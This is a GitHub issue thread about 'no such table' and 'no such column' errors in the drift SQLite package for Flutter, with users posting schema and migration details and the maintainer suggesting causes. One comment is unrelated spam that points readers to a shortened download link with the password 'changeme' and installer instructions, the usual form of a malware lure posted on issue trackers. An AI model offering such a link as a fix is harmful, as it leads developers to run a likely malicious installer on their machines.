### ISSUE TITLE
SqliteException (SqliteException(1): while preparing statement, no such table: word, SQL logic error (code 1) Causing statement: SELECT * FROM "word";)

### ISSUE THREAD

**Issue by ourweb4** [simolus3/moor#3180]
HI, I'm trying to write a database but it keeps giving me the above error.I think I created the database right way to my knowledge. Thanks

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by simolus3** [comment]
Well, how did you create the database then? Can you show some related snippets?

Some likely causes are:

1. You're running the app on a desktop device and the database file you're using has already been created by another application, so drift didn't create the tables.
2. You've added the `words` table after running the app with the initial database once, and didn't write a migration to upgrade the database and add the table.

But I'm going to need more information to provide meaningful help here.

**Comment by ourweb4** [comment]
https://github.com/ourweb4/mva.git

**Comment by dkliss** [comment]
Hi, I keep on getting exact same error SqliteException(1): while preparing statement, no such table ... even when i see table created in .g file. I wiped my emulator data and still not use. Table exist after i run runner but no idea why i cannot use it. I tested on ios, android emulators as well as macos. Same error. I even tried to rename tables. This happens after i create new tables. I created a table before which is still working but any new separate tables created have below error, even when i see the name in .g database file. Also, primary key is assigned by me and not auto incremented key and am using companions.

Package version:  drift: ^2.18.0

```
Causing statement: SELECT * FROM
 Error executing query: SqliteException(1): while preparing statement, no such table
QL logic error (code 1)
SqliteException(1): while preparing statement, no such table:
Causing statement: SELECT * FROM "

Example Table 

TextColumn get contactUniqueIdentifier =>
      text().customConstraint('NOT NULL UNIQUE')(); // Non-nullable and unique
  TextColumn get name => text()
      .withDefault(const Constant(''))(); // Nullable with default empty string
  TextColumn get type => text()
      .withDefault(const Constant(''))(); // Nullable with default empty string
  // Empty fields for future use
  TextColumn get emptyField1 => text()
      .withDefault(const Constant(''))(); // Nullable with default empty string
  TextColumn get emptyField2 => text()
      .withDefault(const Constant(''))(); // Nullable with default empty string
  TextColumn get emptyField3 => text()
      .withDefault(const Constant(''))(); // Nullable with default empty string
  @override
  Set<Column> get primaryKey => {uniqueIdentifier}; // Primary key
```

**Comment by ourweb4** [comment]
Hi, Is there another  package I can use for database other than drift? That will work please

**Comment by DucThu-Dev** [comment]
I also ran into this issue today.
My app was running database version 2. Then I added a new table, bump the db version to 3, write migration code, but then my app run into this error.
Here is the log.
The "CREATE TABLE IF NOT EXISTS..." is the create table string buffer that generated when doing migration, and I added a print() to try to print it out to check. And base on it, I can see that field 'dictation_source' is included, so it means it already created while migration.
But then when I made a query, it throw error indicate that 'no such column: user_vocabularies.dictation_source'.

<img width="1351" height="535" alt="Image" src="https://github.com/user-attachments/assets/9fb16a97-6ef2-420b-8010-ea0ceb9e8905" />

Hope this help you have information to fix it. I really appreciate your effort.

**Comment by DucThu-Dev** [comment]
The dictationSource field is a text and it use a converter
 ```dart
TextColumn get dictationSource => text().map(const AppUserDictationVocabularyItemModelsConverter())();
```

and this is my converter

<img width="1039" height="463" alt="Image" src="https://github.com/user-attachments/assets/0d96f0b7-aba9-4c6c-bd7b-261b21bae4bd" />

Maybe I used it wrong way?

**Comment by DucThu-Dev** [comment]
Update: I tried to rename the field name and make the field nullable, but it still the same.
Then I tried to add the column after create the table manually, and it worked, the error go away on Android, but it do not work on iOS.

<img width="832" height="91" alt="Image" src="https://github.com/user-attachments/assets/7a2ee71b-6e9b-498d-85bf-9fefaf2866c1" />

But create a column after create the table seems make no sense for me. I'm not sure if it is good to go.

**Comment by simolus3** [comment]
I don't think the type converter is the problem here. It's possible on some devices the migration run before you were done writing it (this can happen if you have the app open while you're working on your changes and then it hot reloads). Does the same issue happen on new installations?

Since you're already using step-by-step migrations, do you have tests for the migrations? Are those failing as well?

>  The "CREATE TABLE IF NOT EXISTS..." is the create table string buffer that generated when doing migration, and I added a print() to try to print it out to check. And base on it, I can see that field 'dictation_source' is included, so it means it already created while migration.

The statement probably doesn't do anything because the table already exists at this point. You migration shouldn't have to create the table, but the `addColumn` step looks correct to me.

**Comment by DucThu-Dev** [comment]
All the generated migration test passed.

This is how I tested:
I install the previous release apk (from Git commit) on Android first, then checkout to current code and run release with new db version, then the above error occurs.

Lastly, I tried the same way on Android emulator and IOS Simulator, but in debug mode, and there is no error anymore. But it still happen on my Android device. I tried to clear its cached but still the same.

Maybe it only happen on my Android device. Unfortunately I do not have any other Android device to test.

Could the problem is my device? Because in new db version, I edit and install multiple times on my device.

**Comment by simolus3** [comment]
> Maybe it only happen on my Android device. Unfortunately I do not have any other Android device to test.

Before you uninstall the app, can you try deleting its data first? Sometimes when you uninstall an app, Android "helpfully" keeps its data around and re-uses it when you install the app again.

**Comment by DucThu-Dev** [comment]
Yes, I did clear the cache data through setting, then uninstall the app, then start to test with above steps as I described.

**Comment by simolus3** [comment]
That is really odd - do you have a way (e.g. with `adb`) to pull the database from the device before and after the migration?
